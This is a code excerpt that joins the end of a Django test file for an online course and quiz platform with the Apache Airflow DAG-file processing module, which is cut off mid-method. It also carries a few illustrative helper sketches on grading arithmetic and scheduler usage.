time_diff = updated_course.start_enroll_time - timezone.now()
actual_days = time_diff.days + 1
self.assertEqual(updated_course.days_before_start(), actual_days)
self.course.start_enroll_time = course_time
self.course.save()
###############################################################################
class TestCaseTestCases(unittest.TestCase):
def setUp(self):
self.user = User.objects.get(username="creator")
self.question1 = Question(summary='Demo question 1',
language='Python',
type='Code',
active=True,
description='Write a function',
points=1.0,
user=self.user,
snippet='def myfunc()'
)
self.question2 = Question(summary='Demo question 2',
language='Python',
type='Code',
active=True,
description='Write to standard output',
points=1.0,
user=self.user,
snippet='def myfunc()'
)
self.question1.save()
self.question2.save()
self.assertion_testcase = StandardTestCase(
question=self.question1,
test_case='assert myfunc(12, 13) == 15',
type='standardtestcase'
)
self.stdout_based_testcase = StdIOBasedTestCase(
question=self.question2,
expected_output='Hello World',
type='standardtestcase'
)
self.assertion_testcase.save()
self.stdout_based_testcase.save()
answer_data = {'metadata': { 'user_answer': 'demo_answer',
'language': 'python',
'partial_grading': False
},
'test_case_data': [{'test_case': 'assert myfunc(12, 13) == 15',
'test_case_type': 'standardtestcase',
'test_case_args': "",
'weight': 1.0
}]
}
self.answer_data_json = json.dumps(answer_data)
def test_assertion_testcase(self):
""" Test question """
self.assertEqual(self.assertion_testcase.question, self.question1)
self.assertEqual(self.assertion_testcase.test_case,
'assert myfunc(12, 13) == 15')
def test_stdout_based_testcase(self):
""" Test question """
self.assertEqual(self.stdout_based_testcase.question, self.question2)
self.assertEqual(self.stdout_based_testcase.expected_output,
'Hello World'
)
def test_consolidate_answer_data(self):
""" Test consolidate answer data model method """
result = self.question1.consolidate_answer_data(
user_answer="demo_answer"
)
actual_data = json.loads(result)
exp_data = json.loads(self.answer_data_json)
self.assertEqual(actual_data['metadata']['user_answer'], exp_data['metadata']['user_answer'])
self.assertEqual(actual_data['test_case_data'], exp_data['test_case_data'])
class AssignmentUploadTestCases(unittest.TestCase):
def setUp(self):
self.user1 = User.objects.get(username="creator")
self.user1.first_name = "demo"
self.user1.last_name = "user"
self.user1.save()
self.user2 = User.objects.get(username="demo_user3")
self.user2.first_name = "demo"
self.user2.last_name = "user3"
self.user2.save()
self.quiz = Quiz.objects.get(description="demo quiz 1")
self.questionpaper = QuestionPaper.objects.create(quiz=self.quiz,
total_marks=0.0,
shuffle_questions=True
)
self.question = Question.objects.create(summary='Assignment',
language='Python',
type='upload',
active=True,
description='Upload a file',
points=1.0,
snippet='',
user=self.user1
)
self.questionpaper.fixed_question_order = "{0}".format(self.question.id)
self.questionpaper.fixed_questions.add(self.question)
file_path1 = os.path.join(tempfile.gettempdir(), "upload1.txt")
file_path2 = os.path.join(tempfile.gettempdir(), "upload2.txt")
self.assignment1 = AssignmentUpload.objects.create(user=self.user1,
assignmentQuestion=self.question, assignmentFile=file_path1,
question_paper=self.questionpaper
)
self.assignment2 = AssignmentUpload.objects.create(user=self.user2,
assignmentQuestion=self.question, assignmentFile=file_path2,
question_paper=self.questionpaper
)
def test_get_assignments_for_user_files(self):
assignment_files, file_name = AssignmentUpload.objects.get_assignments(
self.questionpaper, self.question.id,
self.user1.id
)
self.assertIn("upload1.txt", assignment_files[0].assignmentFile.name)
self.assertEqual(assignment_files[0].user, self.user1)
actual_file_name = self.user1.get_full_name().replace(" ", "_")
file_name = file_name.replace(" ", "_")
self.assertEqual(file_name, actual_file_name)
def test_get_assignments_for_quiz_files(self):
assignment_files, file_name = AssignmentUpload.objects.get_assignments(
self.questionpaper
)
files = [os.path.basename(file.assignmentFile.name)
for file in assignment_files]
question_papers = [file.question_paper for file in assignment_files]
self.assertIn("upload1.txt", files)
self.assertIn("upload2.txt", files)
self.assertEqual(question_papers[0].quiz, self.questionpaper.quiz)
actual_file_name = self.quiz.description.replace(" ", "_")
file_name = file_name.replace(" ", "_")
self.assertIn(actual_file_name, file_name)
class CourseStatusTestCases(unittest.TestCase):
def setUp(self):
user = User.objects.get(username='creator')
self.course = Course.objects.create(name="Demo Course", creator=user,
enrollment="Enroll Request")
self.module = LearningModule.objects.create(name='M1', creator=user,
description='module one')
self.quiz1 = Quiz.objects.create(time_between_attempts=0, weightage=50,
description='qz1')
self.quiz2 = Quiz.objects.create(time_between_attempts=0, weightage=100,
description='qz2')
question = Question.objects.first()
self.qpaper1 = QuestionPaper.objects.create(quiz=self.quiz1)
self.qpaper2 = QuestionPaper.objects.create(quiz=self.quiz2)
self.qpaper1.fixed_questions.add(question)
self.qpaper2.fixed_questions.add(question)
self.qpaper1.update_total_marks()
self.qpaper2.update_total_marks()
self.qpaper1.save()
self.qpaper2.save()
self.unit_1_quiz = LearningUnit.objects.create(order=1, type='quiz',
quiz=self.quiz1)
self.unit_2_quiz = LearningUnit.objects.create(order=2, type='quiz',
quiz=self.quiz2)
self.module.learning_unit.add(self.unit_1_quiz)
self.module.learning_unit.add(self.unit_2_quiz)
self.module.save()
self.course.learning_module.add(self.module)
student = User.objects.get(username='course_user')
self.course.students.add(student)
self.course.save()
attempt = 1
ip = '127.0.0.1'
self.answerpaper1 = self.qpaper1.make_answerpaper(student, ip, attempt,
self.course.id)
self.answerpaper2 = self.qpaper2.make_answerpaper(student, ip, attempt,
self.course.id)
self.course_status = CourseStatus.objects.create(course=self.course,
user=student)
def tearDown(self):
self.course_status.delete()
self.answerpaper1.delete()
self.answerpaper2.delete()
self.qpaper1.delete()
self.qpaper2.delete()
self.quiz1.delete()
self.quiz2.delete()
self.unit_1_quiz.delete()
self.unit_2_quiz.delete()
self.module.delete()
self.course.delete()
def test_course_is_complete(self):
# When
self.course_status.completed_units.add(self.unit_1_quiz)
# Then
self.assertFalse(self.course_status.is_course_complete())
# When
self.course_status.completed_units.add(self.unit_2_quiz)
# Then
self.assertTrue(self.course_status.is_course_complete())
# Given
self.answerpaper1.marks_obtained = 1
self.answerpaper1.save()
self.answerpaper2.marks_obtained = 0
self.answerpaper2.save()
# When
self.course_status.calculate_percentage()
# Then
self.assertEqual(round(self.course_status.percentage, 2), 33.33)
# When
self.course_status.set_grade()
# Then
self.assertEqual(self.course_status.get_grade(), 'F')
# Given
self.answerpaper1.marks_obtained = 0
self.answerpaper1.save()
self.answerpaper2.marks_obtained = 1
self.answerpaper2.save()
# When
self.course_status.calculate_percentage()
# Then
self.assertEqual(round(self.course_status.percentage, 2), 66.67)
# When
self.course_status.set_grade()
# Then
self.assertEqual(self.course_status.get_grade(), 'B')
# Test get course grade after completion
self.assertEqual(self.course.get_grade(self.answerpaper1.user), 'B')
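

# Editor's note: a minimal illustrative sketch, not part of the test suite.
# It spells out the weighted-percentage arithmetic the assertions above imply
# (quiz weightages 50 and 100, each quiz having a single 1-mark question):
#   (100 * 50 + 0 * 100) / (50 + 100) == 33.33
#   (0 * 50 + 100 * 100) / (50 + 100) == 66.67
# The helper name and signature below are hypothetical.
def _weighted_course_percent(scores_and_weightages):
    """Return the weighted percentage for (percent_score, weightage) pairs."""
    total_weight = sum(weight for _, weight in scores_and_weightages)
    weighted_sum = sum(score * weight for score, weight in scores_and_weightages)
    return round(weighted_sum / total_weight, 2)


# Example: _weighted_course_percent([(100, 50), (0, 100)]) -> 33.33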
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import logging
import multiprocessing
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
from typing import Any, Callable, Dict, KeysView, List, NamedTuple, Optional, Tuple
import psutil
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.models import Connection, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths
from airflow.utils.helpers import reap_process_group
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id: Optional[str] = None):
self._dag_id: str = dag.dag_id
self._task_ids: List[str] = [task.task_id for task in dag.tasks]
self._full_filepath: str = dag.full_filepath
self._concurrency: int = dag.concurrency
self._pickle_id: Optional[str] = pickle_id
self._task_special_args: Dict[str, Any] = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if special_args:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self) -> str:
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self) -> List[str]:
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self) -> str:
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self) -> int:
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def pickle_id(self) -> Optional[str]: # pylint: disable=invalid-overridden-method
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self) -> Dict[str, Any]:
"""Special arguments of the task."""
return self._task_special_args
def get_task_special_arg(self, task_id: str, special_arg_name: str):
"""Retrieve special arguments of the task."""
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
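

# Editor's note: a hedged usage sketch, not part of the original module.  It
# shows the read-only view SimpleDag exposes; ``dag`` is assumed to be an
# ``airflow.models.DAG`` instance obtained elsewhere, and this function is
# illustrative only.
def _example_simple_dag_usage(dag):
    """Build a SimpleDag and collect its per-task special arguments."""
    simple_dag = SimpleDag(dag, pickle_id=None)
    concurrencies = {
        task_id: simple_dag.get_task_special_arg(task_id, 'task_concurrency')
        for task_id in simple_dag.task_ids
    }
    return simple_dag.dag_id, simple_dag.full_filepath, concurrencies
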
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags: List[SimpleDag]):
"""
Constructor.
        :param simple_dags: SimpleDag objects that should be in this bag
        :type simple_dags: list[airflow.utils.dag_processing.SimpleDag]
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag: Dict[str, SimpleDag] = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self) -> KeysView[str]:
"""
        :return: IDs of all the DAGs in this bag
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id: str) -> SimpleDag:
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
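

# Editor's note: a small illustrative sketch, not part of the original source,
# showing how a SimpleDagBag is typically queried.  ``simple_dags`` is assumed
# to be a list of SimpleDag objects such as those harvested by the agent below.
def _example_simple_dag_bag_lookup(simple_dags, dag_id):
    """Return the SimpleDag for ``dag_id``, or None instead of raising."""
    dag_bag = SimpleDagBag(simple_dags)
    if dag_id in dag_bag.dag_ids:
        return dag_bag.get_dag(dag_id)
    return None
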
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> int:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Tuple[List[SimpleDag], int]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
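

# Editor's note: a minimal, hypothetical stub that satisfies the abstract
# interface above.  It is not the scheduler's real DagFileProcessorProcess,
# which runs SchedulerJob.process_file() in a child process; it is included
# only to make the required surface concrete.
class _StubDagFileProcessorProcess(AbstractDagFileProcessorProcess):
    """Pretends to process a file instantly, reporting no DAGs and no errors."""

    def __init__(self, file_path):
        self._file_path = file_path
        self._start_time = None
        self._done = False

    def start(self):
        self._start_time = timezone.utcnow()
        self._done = True  # nothing to do: finish immediately

    def terminate(self, sigkill=False):
        self._done = True

    @property
    def pid(self):
        return os.getpid()  # no child process in this stub

    @property
    def exit_code(self):
        return 0

    @property
    def done(self):
        return self._done

    @property
    def result(self):
        return [], 0  # no SimpleDags found, no import errors

    @property
    def start_time(self):
        return self._start_time

    @property
    def file_path(self):
        return self._file_path
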
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: datetime
last_duration: float
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
    Agent for DAG file processing. It is responsible for all DAG-parsing
    related jobs in the scheduler process: it spins up DagFileProcessorManager
    in a subprocess, collects DAG parsing results from it and exchanges
    signals and DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
    :param processor_factory: function that creates processors for DAG
        definition files. Arguments are (dag_definition_path, zombies)
    :type processor_factory: (str, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory,
max_runs,
processor_factory,
processor_timeout,
async_mode):
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
        Launch the DagFileProcessorManager process and start the DAG parsing loop in the manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
        Should only be used when the DAG file processor manager was launched in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
            # If the manager died because of an error, we will notice it and
            # restart it when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
"""Waits until DAG parsing is finished."""
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
        # Make this process start as a new process group - that makes it easy
        # to kill all sub-processes of this one at the OS level, rather than
        # having to iterate over the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
        # Reload configurations and settings to avoid collisions with the parent
        # process, because this process may need custom configurations that cannot
        # be shared (e.g. RotatingFileHandler), and connections can get corrupted
        # if we do not recreate the SQLAlchemy connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
        :return: List of parsing results in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def done(self):
"""
Has DagFileProcessorManager ended?
"""
return self._done
@property
def all_files_processed(self):
"""
Have all files been processed at least once?
"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
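

# Editor's note: a hedged lifecycle sketch, not part of the original module.
# It drives the agent in sync mode as described in the docstrings above; the
# ``processor_factory`` argument is assumed to produce objects compatible with
# AbstractDagFileProcessorProcess, and the function itself is illustrative.
def _example_agent_loop(dag_directory, processor_factory, iterations=1):
    """Run a few parsing loops and return the harvested SimpleDag objects."""
    agent = DagFileProcessorAgent(
        dag_directory=dag_directory,
        max_runs=iterations,
        processor_factory=processor_factory,
        processor_timeout=timedelta(minutes=5),
        async_mode=False,
    )
    agent.start()
    harvested = []
    try:
        for _ in range(iterations):
            agent.heartbeat()            # ask the manager to run one loop
            agent.wait_until_finished()  # block until processors complete
            harvested.extend(agent.harvest_simple_dags())
    finally:
        agent.terminate()
        agent.end()
    return harvested
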
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
    :param processor_factory: function that creates processors for DAG
        definition files. Arguments are (dag_definition_path, zombies)
    :type processor_factory: (unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: multiprocessing.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[Any]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: Connection,
async_mode: bool = True):
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parsing_start_time: Optional[datetime] = None
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
            self.log.warning(
                "Because we cannot use more than 1 thread (max_threads = %d) "
                "when using sqlite, parallelism is set to 1.", self._parallelism
            )
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
        # How many seconds we wait for tasks to heartbeat before marking them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies: List[SimpleTaskInstance] = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
def register_exit_signals(self):
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
# pylint: disable=no-else-break
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
# pylint: enable=no-else-break
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
self._kill_timed_out_processors()
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
        Refresh file paths from the dag directory if we haven't done it recently.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
# noinspection PyBroadException
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # pylint: disable=broad-except
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if 0 < self.print_stats_interval < (
timezone.utcnow() - self.last_stat_print_time).total_seconds():
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time) if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
        rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime.total_seconds()) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
